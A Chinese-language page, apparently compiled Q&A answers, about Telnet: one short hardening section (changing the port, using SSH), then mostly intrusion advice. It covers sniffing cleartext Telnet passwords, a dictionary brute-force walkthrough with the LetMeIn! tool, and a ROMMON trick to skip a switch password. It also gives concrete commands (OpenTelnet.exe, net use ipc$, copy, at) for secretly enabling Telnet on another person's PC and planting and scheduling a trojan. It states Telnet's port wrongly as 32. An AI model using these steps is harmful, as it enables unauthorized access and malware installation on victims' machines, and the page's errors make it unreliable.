本文目录一览:
如何提高Telnet的安全性
Telnet工具其实是Windows系统自带的一个命令程序,该程序凭借操作简单、使用方便这一特点,赢得了不少网络管理员的青睐,可是,使用该工具远 程管理服务器时,也存在一些安全缺陷,例如默认的Telnet端口是23,几乎人人皆知,这很容易成为人们的攻击目标,而且Telnet工具在传输远程数 据和密码时,几乎都是以明文方式进行的,显然这些数据很容易被非法用户轻易窃取到,我以前设计过的黑客游戏通过cain抓过破解telnet密码的数据包 ,都是明文的。为了保证Telnet远程控制的安全,我们可以做以下修改:
如果将服务器的远程控制端口号码修改成一个不为人所知的号码时,那么其他人只有知道这个新的端口号码,才能通过Telnet工具,成功与目标服务器建立远程控制连接。例如,在将默认的23端口,修改成新的1001端口时,可以按照如下步骤来进行:
首先打开目标服务器系统的“开始”菜单,点选“运行”命令,弹出系统运行对话框,在其中执行“cmd”字符串命令,将系统工作状态切换到DOS命令行状态;
其次在命令行提示符下,输入“tlntadmn config port=1001”字符串命令,单击回车键后,本地服务器的Telnet端口号码就变成1001了;当然,需要提醒各位注意的是,新端口号码不能和服务 器系统中已知服务的端口号码相同,否则会出现端口冲突现象,那样一来远程控制操作就无法成功了。
日后当我们与目标服务器建立远程控制连接时,必须在服务器主机后面加上新的端口号码,格式为:telnet ip 端口,才能通过Telnet命令成功登录进目标服务器系统。
此外,为了防止非法用户窃取Telnet数据信息,我们也可以用SSH来代替Telnet,因为从SSH客户端远程控制服务器端时,远程控制数据信息都是以非明文方式进行传输的。
本文来自电脑知识信息网 谢谢支持
如何破解TELNET帐号和密码!
talnet 登录和Windows登录一样,需要确认用户名与密码。
如果你有电脑功底可以试下从135端口扫对方服务,如果有开启服务可以用工具扫对方的空密码和弱密码账号。一般意识不好的用户都用123456和空密码就是没密码的账号,为了方便开机。还有网吧的账号除了管理机之外客服机的密码都是一置的,如果攻破一台都是整个网吧
telnet都是明文传输数据的,你只要截取到报文就行了,通常telnet用的是固定的32号端口。
进行截取报文的软件,通常称为协议分析软件,国产的有科来软件(有免费版的),用它来监视32号端口的字节数据,并用ASCII进行解码。
这类软件理论上安装在数据传送路径中的任何一台电脑上都可以截取到报文,但前提是必需有人或物发送了这些报文。
还有一种暴力破解如下:
首先启动 LetMeIn! V1.0, 我们先假设在 nowhere.unix.net 中有一个帐号叫作 guest
使用的密码为 guest003, 且我们有一个 dic.txt 档案, 内含有字典档, 其内容为:
-----Cut here DIC.TXT ------
guest001
guest002
guest003
guest004
----- End of DIC.TXT -------
我们先了解一下 Telnet连线到 nowhere.unix.net 中的情况是如何回应的, 先启动我
们的 Telnet 软体, Telnet nowhere.unix.net 中:
ms.hinet.net telnet nowhere.unix.net (Telnet 试试看....)
Trying 111.222.255.255...
Connected to nowhere.unix.net
Escape character is ^].
Digital UNIX (nowhere.unix.net) (ttypa)
login: guest
Password:
Login incorrect
login: guest
Password:
Login incorrect
嗯, 试了两次之後断线吧! 因为我们已经知道要如何设定 LetMeIn! 了, 首先在 Setu
Keys 中输入帐号名称, 也就是我们所要破解的 guest~, 为甚麽在帐号名称後要加上
一个 ~ 字元呢?? 因为我们要模拟输入帐号後的 Enter 键, 我们要使用字典档破解,
所以接着选 Use Password File To Find.... ê一个选项, 再按下 Select file 选择
我们预先准备好的字典档 "DIC.TXT", After Key 中只要输入 ~ 即可, 也是用来模拟
Enter 键用的! 在 Delay 中设定为 8 秒, Pass Delay 2 秒不动, 接着启动你的 Telnet
软体, 先 Telnet 到 nowhere.unix.net, 回到 LetMeIn! 中按下 Start Break 键後在
8 秒内将焦点转到 Telnet 软体中, 开始破解:
ms.hinet.net telnet nowhere.unix.net (先 Telnet)
Trying 111.222.255.255...
Connected to nowhere.unix.net
Escape character is ^].
Digital UNIX (nowhere.unix.net) (ttypa)
(焦点转回, 底下为 LetMeIn! 自动输入....)
login: guest
Password: (输入了 guest001)
Login incorrect
login: guest
Password: (输入了 guest001)
Login incorrect
login: guest
Password: (输入了 guest003)
Welcome to nowhere.unix.net, Guest login succ....(略)
成功了! 请回到 LetMeIn! 中选择 Stop Break 开始使用 guest 这个帐号吧!!
LetMeIn! 1.0 本身并没有支援自动 Telnet 破解, 所以必需要您使用一般的 Telnet
程式来作破解的工作, 基於这个原因, James 目前正在改写的 LetMeIn! V2.0 将会
支援 PPP 连线的 Telnet 破解, 并可能会多一个 Mail Password 的功能, 你可以随便
将它放在一台机器上跑, 设定你的 Mail Address, 在找到後会 Mail Password 给你!
不过一切要等 LetMeIn! 2.0 正式 Release 才知道啦~~~~
LetMeIn! V1.0 的功能仅作为自动输入, 所以用来破解帐号的能力并不强, 但是如果你
没有办法抓到 /etc/passwd 的话, 也只能用这个方法了, 如果你用 ClayMore 来作这
样的动作, 你会发觉在网路频宽不ì的情况之下, LetMeIn! 的 Pass Delay 功能变得
非常有用, 而 ClayMore 却不能在这种情况之下作任何的 Delay.. 也没有甚麽用处了!
LetMeIn! 虽然有其用处, 不过在 Crack Password 上还是没有直接抓 etc/passwd 再
Crack Jack 快! 不过如果系统真没有一点漏洞, 还是只有这个方式可行
交换机telnet 密码暴力破解
进入ROMMON模式,先初始化然后改软件名称,这样就可以跳过密码了。记住,进入交换机之后再把软件改过来
如何秘密打开别人电脑的telnet服务
兄弟,用软件,下载opentelnet.exe,然后放在C:\Documents and Settings\Administrator目录下,然后可以用cmd下命令OpenTelnet.exe \\对方ip地址 administrator "对方密码" 1 90 就可以连接了。前提是你要知道对方ip和对方计算机的密码,密码可以下载流光5.0去破解。如果连接成功就开辟了对方计算机90号端口。然后telnet 对方ip 90 就连接上去了。这样就可以用tftp命令往里面传木马了。
下面还有一个方法,用流光5.0探到对方密码后
net use \\对方ip\ipc$ "对方密码" /user:"administrator" 建立连接
net time \\对方IP 查看对方当前时间
把木马放在C:\Documents and Settings\Administrator下 然后 copy 木马名称 \\对方ip\c 即将当前目录下的文件复制到对方c盘内
at \\对方ip 时间 木马名 在什么时间运行木马,一般在查看了对方时间后晚3分钟运行。
这样到了时间后,恭喜,你就可以用自己的木马控制端口查看对方了。
就简单说下了,有什么不懂的再来问我,我保证会把你培养成一流的黑客的。
还有,opentelnet.exe和流光5.0必须下载,这是居家旅行,杀人灭口必备良药!
怎样破解telnet密码
首先需要说明一点的就是:如果从破解密码的角度上讲的话,那可绝对不是一件容易的事情!因为首先必须要学习、并且精通很多的数学知识。例如:计算机密码编码学与网络安全、组合数学、高等数学等专业知识,然后还必须要精通:计算机操作系统内部结构、计算机操作系统的底层结构、计算机网络原理及其相关的编程技术,只有这样,你才有可能破解密码。